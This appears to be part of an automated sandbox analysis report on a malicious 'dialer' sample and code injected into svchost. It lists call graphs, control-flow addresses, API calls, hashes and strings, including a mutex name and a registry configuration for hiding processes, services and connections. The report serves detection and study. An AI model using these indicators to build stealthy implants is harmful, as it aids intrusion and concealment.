                                                                          callgraph 0 Function_00000001400056E1 1 Function_0000000140001AE4 33 Function_0000000140001D40 1->33 75 Function_0000000140001BA0 1->75 2 Function_00000001400014E5 71 Function_0000000140001394 2->71 3 Function_00000001400010F0 4 Function_00000001400014F4 4->71 5 Function_0000000140001800 66 Function_0000000140002290 5->66 6 Function_0000000140002500 7 Function_0000000140001000 8 Function_0000000140001E00 7->8 41 Function_0000000140001750 7->41 79 Function_0000000140001FB0 7->79 87 Function_0000000140001FC0 7->87 9 Function_0000000140002F00 59 Function_0000000140001370 9->59 10 Function_0000000140005D00 34 Function_0000000140005A40 10->34 11 Function_0000000140003101 12 Function_0000000140005701 13 Function_0000000140005801 14 Function_0000000140001503 14->71 15 Function_0000000140001404 15->71 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140001512 18->71 19 Function_0000000140002420 20 Function_0000000140002320 21 Function_0000000140003120 22 Function_0000000140005A20 23 Function_0000000140001521 23->71 24 Function_0000000140005721 25 Function_0000000140005821 26 Function_0000000140001422 26->71 27 Function_0000000140001530 27->71 28 Function_0000000140005830 29 Function_0000000140001431 29->71 30 Function_0000000140005931 31 Function_000000014000153F 31->71 32 Function_0000000140003140 33->66 35 Function_0000000140001440 35->71 36 Function_0000000140001140 50 Function_0000000140001160 36->50 37 Function_0000000140005741 38 Function_0000000140001F47 60 Function_0000000140001870 38->60 39 Function_0000000140002050 40 Function_0000000140005A50 40->34 42 Function_0000000140001650 43 Function_0000000140003051 44 Function_0000000140005851 45 Function_000000014000155D 45->71 46 Function_000000014000145E 46->71 47 Function_0000000140002460 48 Function_0000000140002660 49 Function_0000000140003160 49->9 49->14 49->23 49->26 49->27 49->29 49->31 49->34 49->35 49->46 49->48 55 Function_000000014000156C 49->55 56 Function_000000014000146D 49->56 49->59 62 Function_000000014000157B 49->62 76 Function_00000001400015A8 49->76 77 Function_00000001400014A9 49->77 86 Function_00000001400016C0 49->86 97 Function_00000001400014D6 49->97 99 Function_00000001400026E0 49->99 50->49 50->50 50->60 63 Function_0000000140001880 50->63 65 Function_0000000140001F90 50->65 50->86 51 Function_0000000140001760 100 Function_00000001400020E0 51->100 52 Function_0000000140005761 53 Function_0000000140005961 54 Function_0000000140001E65 54->60 55->71 56->71 57 Function_000000014000216F 58 Function_0000000140001A70 58->33 58->75 61 Function_0000000140003070 62->71 63->19 63->33 63->48 63->75 64 Function_0000000140005881 67 Function_0000000140002590 68 Function_0000000140003090 69 Function_0000000140002691 70 Function_0000000140005791 71->10 71->40 72 Function_0000000140002194 72->60 73 Function_000000014000219E 74 Function_0000000140001FA0 75->33 78 Function_00000001400023B0 75->78 91 Function_00000001400024D0 75->91 76->71 77->71 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400057B1 84 Function_00000001400059B1 85 Function_0000000140001AB3 85->33 85->75 88 Function_00000001400058C1 89 Function_0000000140001AC3 89->33 89->75 90 Function_00000001400014C7 90->71 92 Function_00000001400017D0 93 Function_0000000140001FD0 94 Function_00000001400026D0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->33 96->75 97->71 98 Function_00000001400022E0 99->2 99->4 99->14 99->18 99->34 99->45 99->46 99->48 99->59 99->77 99->90 101 Function_00000001400017E0 101->100

                                                                          Executed Functions

                                                                          Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtFlushVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: FlushMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 3327305600-0
                                                                          • Opcode ID: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                                                          • Instruction ID: 35ac0efe93fe85c119e55826d4317f241f31154ff2ae5808118bfd6961f8b30b
                                                                          • Opcode Fuzzy Hash: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                                                          • Instruction Fuzzy Hash: B5F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB40

                                                                          Non-executed Functions

                                                                          Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 317 140002774-14000277a 315->317 323 140002953-14000297b call 1400014c7 316->323 324 140002864-140002873 316->324 317->316 319 140002780-140002787 317->319 321 140002789-140002792 319->321 322 140002750-140002752 319->322 328 140002794-1400027ab 321->328 329 1400027f8-1400027fb 321->329 327 14000275a-14000276e 322->327 340 140002986-1400029c8 call 140001503 call 140005a40 323->340 341 14000297d 323->341 325 140002eb7-140002ef4 call 140001370 324->325 326 140002879-140002888 324->326 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->317 334 1400027f5 328->334 335 1400027ad-1400027c2 328->335 329->327 331->323 332->331 334->329 339 1400027d0-1400027d7 335->339 342 1400027d9-1400027f3 339->342 343 140002800-140002809 339->343 349 140002e49-140002e84 call 140001370 340->349 350 1400029ce-1400029d5 340->350 341->340 342->334 342->339 343->327 352 1400029d7-140002a0c 349->352 357 140002e8a 349->357 351 140002a13-140002a43 wcscpy wcscat wcslen 350->351 350->352 354 140002a45-140002a76 wcslen 351->354 355 140002a78-140002aa5 351->355 352->351 358 140002aa8-140002abf wcslen 354->358 355->358 357->351 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$\BaseNamedObjects\fzjpudgzjtiqjjkhgcgqpixo$`
                                                                          • API String ID: 597572034-2421778612
                                                                          • Opcode ID: 7ae1bb7e4b724b2ef69abbdd7b91bcb67c75066fc2420774548d9815dca7bf36
                                                                          • Instruction ID: 82904f839f72ce91394cb6233b55af986959722d867cc147669b016d1af11518
                                                                          • Opcode Fuzzy Hash: 7ae1bb7e4b724b2ef69abbdd7b91bcb67c75066fc2420774548d9815dca7bf36
                                                                          • Instruction Fuzzy Hash: 9A1259B2608B8481E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700
                                                                          Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID:
                                                                          • API String ID: 2643109117-0
                                                                          • Opcode ID: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                                                          • Instruction ID: 463d8eadf6764cf81835e2f5447ee9fd2fbaf236c41788732bd38f3ca502ba48
                                                                          • Opcode Fuzzy Hash: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                                                          • Instruction Fuzzy Hash: 5A5123B1611A4085FB16EF27F9947EA27A5AB8D7D0F849121FB4D873B6DE38C4958300
                                                                          Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 437 140001cf4-140001cfe call 140001d40 430->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->438 433 140001bf3-140001c02 431->433 434 140001be0-140001be7 431->434 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                                                          • Instruction ID: 5c7ee5ee1b8a04923d5a96a0df04d384374ee326a967495c8333b08c7993e382
                                                                          • Opcode Fuzzy Hash: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                                                          • Instruction Fuzzy Hash: 294143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                                          Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 926137887-0
                                                                          • Opcode ID: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                                                          • Instruction ID: 85fbb11ae3983d049e5aa99e15e4bef804ab9b98c2283f83d64eac87ba6817d4
                                                                          • Opcode Fuzzy Hash: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                                                          • Instruction Fuzzy Hash: 9221E3B0705A0292FA5BEB53F9583E92360B76CBD0F444021FB1E476B4DB7A8986C300
                                                                          Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 474 140001e10-140001e2d 475 140001e3e-140001e48 474->475 476 140001e2f-140001e38 474->476 478 140001ea3-140001ea8 475->478 479 140001e4a-140001e53 475->479 476->475 477 140001f60-140001f69 476->477 478->477 482 140001eae-140001eb3 478->482 480 140001e55-140001e60 479->480 481 140001ecc-140001ed1 479->481 480->478 485 140001f23-140001f2d 481->485 486 140001ed3-140001ee2 signal 481->486 483 140001eb5-140001eba 482->483 484 140001efb-140001f0a call 140005ff0 482->484 483->477 491 140001ec0 483->491 484->485 495 140001f0c-140001f10 484->495 489 140001f43-140001f45 485->489 490 140001f2f-140001f3f 485->490 486->485 487 140001ee4-140001ee8 486->487 492 140001eea-140001ef9 signal 487->492 493 140001f4e-140001f53 487->493 489->477 490->489 491->485 492->477 496 140001f5a 493->496 497 140001f12-140001f21 signal 495->497 498 140001f55 495->498 496->477 497->477 498->496
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                                          • Instruction ID: 838ee2c544bf2803730cc930bbb0f4a86f91135578be0a2b6e08d954fec56f6a
                                                                          • Opcode Fuzzy Hash: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                                          • Instruction Fuzzy Hash: A72159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258535BF1A473F9DE3C88828241
                                                                          Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 499 140001880-14000189c 500 1400018a2-1400018f9 call 140002420 call 140002660 499->500 501 140001a0f-140001a1f 499->501 500->501 506 1400018ff-140001910 500->506 507 140001912-14000191c 506->507 508 14000193e-140001941 506->508 509 14000194d-140001954 507->509 510 14000191e-140001929 507->510 508->509 511 140001943-140001947 508->511 514 140001956-140001961 509->514 515 14000199e-1400019a6 509->515 510->509 512 14000192b-14000193a 510->512 511->509 513 140001a20-140001a26 511->513 512->508 516 140001b87-140001b98 call 140001d40 513->516 517 140001a2c-140001a37 513->517 518 140001970-14000199c call 140001ba0 514->518 515->501 519 1400019a8-1400019c1 515->519 517->515 520 140001a3d-140001a5f 517->520 518->515 523 1400019df-1400019e7 519->523 526 140001a7d-140001a97 520->526 524 1400019e9-140001a0d VirtualProtect 523->524 525 1400019d0-1400019dd 523->525 524->525 525->501 525->523 529 140001b74-140001b82 call 140001d40 526->529 530 140001a9d-140001afa 526->530 529->516 536 140001b22-140001b26 530->536 537 140001afc-140001b0e 530->537 540 140001b2c-140001b30 536->540 541 140001a70-140001a77 536->541 538 140001b5c-140001b6c 537->538 539 140001b10-140001b20 537->539 538->529 543 140001b6f call 140001d40 538->543 539->536 539->538 540->541 542 140001b36-140001b57 call 140001ba0 540->542 541->515 541->526 542->538 543->529
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                                                          • Instruction ID: 5534edb58951571e9cddb68e2d52a890a1341d8cf7b14363ea8337f027b41872
                                                                          • Opcode Fuzzy Hash: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                                                          • Instruction Fuzzy Hash: 215114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                          Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 547 140001800-140001810 548 140001812-140001822 547->548 549 140001824 547->549 550 14000182b-140001867 call 140002290 fprintf 548->550 549->550
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                                          • Instruction ID: a02188ec0087b42d3f25a0ad686d1475033a3de64a4a15f6bec79cad075d9a0b
                                                                          • Opcode Fuzzy Hash: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                                          • Instruction Fuzzy Hash: 1DF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310
                                                                          Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 553 14000219e-1400021a5 554 140002272-140002280 553->554 555 1400021ab-1400021c2 EnterCriticalSection 553->555 556 140002265-14000226c LeaveCriticalSection 555->556 557 1400021c8-1400021d6 555->557 556->554 558 1400021e9-1400021f5 TlsGetValue GetLastError 557->558 559 1400021f7-1400021fa 558->559 560 1400021e0-1400021e7 558->560 559->560 561 1400021fc-140002209 559->561 560->556 560->558 561->560
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                                                          • Instruction ID: fd5d896073a876b2497a5a253350f949cfb4402a0739e06ef74f700dacb1e49b
                                                                          • Opcode Fuzzy Hash: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                                                          • Instruction Fuzzy Hash: 0801AFB5705A0192FA5BDB53FE083E86260B76CBD1F454021EF0953AB4DB798996C200

                                                                          Callgraph

                                                                          • Executed
                                                                          • Not Executed
                                                                          • Opacity -> Relevance
                                                                          • Disassembly available
                                                                          callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                                          Executed Functions

                                                                          Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002F.00000002.3586212031.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002F.00000002.3585787306.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002F.00000002.3586212031.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002F.00000002.3586212031.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002F.00000002.3586212031.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002F.00000002.3586212031.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002F.00000002.3586212031.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002F.00000002.3597550484.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_47_2_140000000_dialer.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 1941872368-0
                                                                          • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                          • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                                          Executed Functions

                                                                          Function 00000257E10A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
